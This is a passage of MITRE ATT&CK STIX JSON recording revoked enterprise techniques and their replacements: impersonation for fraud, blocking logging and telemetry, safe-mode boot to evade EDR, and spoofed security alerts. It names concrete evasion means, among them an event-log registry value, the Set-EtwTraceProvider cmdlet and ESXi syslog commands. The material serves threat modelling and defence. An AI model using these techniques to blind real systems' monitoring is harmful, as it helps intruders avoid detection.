                            "Nathaniel Quist, Palo Alto Networks",
                            "Nay Myo Hlaing (Ethan), DBS Bank",
                            "Rob Smith",
                            "Sarathkumar Rajendran, Microsoft Defender365",
                            "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Containers",
                            "ESXi",
                            "IaaS",
                            "Linux",
                            "macOS",
                            "Network Devices",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-08-08 15:42:18.906000+00:00",
                    "modified": "2026-04-14 22:54:38.372000+00:00",
                    "name": "Impersonation",
                    "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1656",
                            "external_id": "T1656"
                        },
                        {
                            "source_name": "CrowdStrike-BEC",
                            "description": "Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.",
                            "url": "https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/"
                        },
                        {
                            "source_name": "VEC",
                            "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
                            "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Pawel Partyka, Microsoft Threat Intelligence",
                        "Blake Strom, Microsoft Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:38.372000+00:00\", \"old_value\": \"2025-04-15 22:41:31.140000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--cd92d2b8-ce43-4666-9472-f1b4b9f4f8be",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:01.082000+00:00",
                        "modified": "2026-04-22 15:50:04.400000+00:00",
                        "name": "Impersonation",
                        "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary\u2019s ultimate goals, possibly against multiple victims.\n\nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary\u2019s goal.\u202f\u202f\n\nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: Crowdstrike BEC)\n\nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may Compromise Accounts targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "stealth"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1684/001",
                                "external_id": "T1684.001"
                            },
                            {
                                "source_name": "Crowdstrike BEC",
                                "description": "Bart Lenaerts-Bergmans. (2023, August 8). What is Business Email Compromise?. Retrieved April 15, 2026.",
                                "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/business-email-compromise-bec/"
                            },
                            {
                                "source_name": "VEC",
                                "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.",
                                "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers."
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Blake Strom, Microsoft Threat Intelligence",
                            "Pawel Partyka, Microsoft Threat Intelligence"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Linux",
                            "macOS",
                            "Office Suite",
                            "SaaS",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-19 19:09:30.329000+00:00",
                    "modified": "2026-04-14 22:54:30.917000+00:00",
                    "name": "Indicator Blocking",
                    "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/006",
                            "external_id": "T1562.006"
                        },
                        {
                            "source_name": "Google Cloud Threat Intelligence ESXi VIBs 2022",
                            "description": "Alexander Marvi, Jeremy Koppen, Tufail Ahmed, and Jonathan Lepore. (2022, September 29). Bad VIB(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors. Retrieved March 26, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/esxi-hypervisors-malware-persistence"
                        },
                        {
                            "source_name": "Broadcom Configuring syslog on ESXi",
                            "description": "Broadcom. (n.d.). Configuring syslog on ESXi. Retrieved March 27, 2025.",
                            "url": "https://knowledge.broadcom.com/external/article/318939/configuring-syslog-on-esxi.html"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        },
                        {
                            "source_name": "LemonDuck",
                            "description": "Manoj Ahuje. (2022, April 21). LemonDuck Targets Docker for Cryptomining Operations. Retrieved June 30, 2022.",
                            "url": "https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/"
                        },
                        {
                            "source_name": "Microsoft Lamin Sept 2017",
                            "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
                            "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
                        },
                        {
                            "source_name": "Microsoft About Event Tracing 2018",
                            "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.",
                            "url": "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events"
                        },
                        {
                            "source_name": "Medium Event Tracing Tampering 2018",
                            "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.",
                            "url": "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Rob Smith",
                        "Lucas Heiligenstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "macOS",
                        "Linux",
                        "ESXi"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:30.917000+00:00\", \"old_value\": \"2025-10-24 17:48:57.704000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--bbde9781-60aa-4b8a-a911-895b0c1b3872",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:26.949000+00:00",
                        "modified": "2026-04-22 15:39:46.202000+00:00",
                        "name": "Disable or Modify Tools",
                        "description": "Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware) \n\nIn addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)\n\nMore advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization\u2019s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685",
                                "external_id": "T1685"
                            },
                            {
                                "source_name": "Cocomazzi FIN7 Reboot",
                                "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
                                "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
                            },
                            {
                                "source_name": "Microsoft Lamin Sept 2017",
                                "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
                                "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
                            },
                            {
                                "source_name": "ETW Palantir",
                                "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved April 15, 2026.",
                                "url": "https://blog.palantir.com/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
                            },
                            {
                                "source_name": "SCADAfence_ransomware",
                                "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
                                "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Alex Soler, AttackIQ",
                            "Cian Heasley",
                            "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                            "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
                            "Gordon Long, LegioX/Zoom, asaurusrex",
                            "Lucas Heiligenstein",
                            "Menachem Goldstein",
                            "Nathaniel Quist, Palo Alto Networks",
                            "Nay Myo Hlaing (Ethan), DBS Bank",
                            "Rob Smith",
                            "Sarathkumar Rajendran, Microsoft Defender365",
                            "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Containers",
                            "ESXi",
                            "IaaS",
                            "Linux",
                            "macOS",
                            "Network Devices",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-06-23 20:00:27.600000+00:00",
                    "modified": "2026-04-14 22:54:34.011000+00:00",
                    "name": "Safe Mode Boot",
                    "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/009",
                            "external_id": "T1562.009"
                        },
                        {
                            "source_name": "BleepingComputer REvil 2021",
                            "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.",
                            "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
                        },
                        {
                            "source_name": "Cybereason Nocturnus MedusaLocker 2020",
                            "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.",
                            "url": "https://www.cybereason.com/blog/medusalocker-ransomware"
                        },
                        {
                            "source_name": "Microsoft Bootcfg",
                            "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.",
                            "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg"
                        },
                        {
                            "source_name": "Microsoft bcdedit 2021",
                            "description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"
                        },
                        {
                            "source_name": "Microsoft Safe Mode",
                            "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.",
                            "url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234"
                        },
                        {
                            "source_name": "CyberArk Labs Safe Mode 2016",
                            "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.",
                            "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"
                        },
                        {
                            "source_name": "Sophos Snatch Ransomware 2019",
                            "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.",
                            "url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Jorell Magtibay, National Australia Bank Limited",
                        "Kiyohito Yamamoto, RedLark, NTT Communications",
                        "Yusuke Kubo, RedLark, NTT Communications"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:34.011000+00:00\", \"old_value\": \"2025-10-24 17:48:33.044000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--c7660f19-f8c5-4ae3-a5e5-24381c270376",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:53:27.979000+00:00",
                        "modified": "2026-04-22 15:48:52.409000+00:00",
                        "name": "Safe Mode Boot",
                        "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Windows Startup Settings)(Citation: Sophos Safe Mode Boot)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason safe mode boot)(Citation: BleepingComputer REvil 2021)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1688",
                                "external_id": "T1688"
                            },
                            {
                                "source_name": "BleepingComputer REvil 2021",
                                "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.",
                                "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
                            },
                            {
                                "source_name": "Sophos Safe Mode Boot",
                                "description": "Andrew Brandt. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved April 15, 2026.",
                                "url": "https://www.sophos.com/en-us/blog/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection"
                            },
                            {
                                "source_name": "Cybereason safe mode boot",
                                "description": "Cybereason Nocturnus. (n.d.). Cybereason vs. MedusaLocker Ransomware. Retrieved April 15, 2026.",
                                "url": "https://www.cybereason.com/blog/research/medusalocker-ransomware"
                            },
                            {
                                "source_name": "Microsoft Windows Startup Settings",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://support.microsoft.com/en-us/windows/windows-startup-settings-1af6ec8c-4d4a-4b23-adb7-e76eef0b847f"
                            },
                            {
                                "source_name": "Microsoft bcdedit",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"
                            },
                            {
                                "source_name": "CyberArk Labs Safe Mode 2016",
                                "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.",
                                "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Jorell Magtibay, National Australia Bank Limited",
                            "Kiyohito Yamamoto, RedLark, NTT Communications",
                            "Yusuke Kubo, RedLark, NTT Communications"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": false,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-14 16:04:24.865000+00:00",
                    "modified": "2026-04-14 22:54:43.164000+00:00",
                    "name": "Spoof Security Alerting",
                    "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders\u2019 awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a \u201chealthy\u201d system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a \u201chealthy\u201d system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/011",
                            "external_id": "T1562.011"
                        },
                        {
                            "source_name": "BlackBasta",
                            "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.",
                            "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Menachem Goldstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows",
                        "macOS",
                        "Linux"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:43.164000+00:00\", \"old_value\": \"2025-04-15 23:12:05.813000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--0ff4bd68-aebb-4039-9e00-9f92c705edf4",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:02.938000+00:00",
                        "modified": "2026-04-22 15:44:20.156000+00:00",
                        "name": "Modify or Spoof Tool UI",
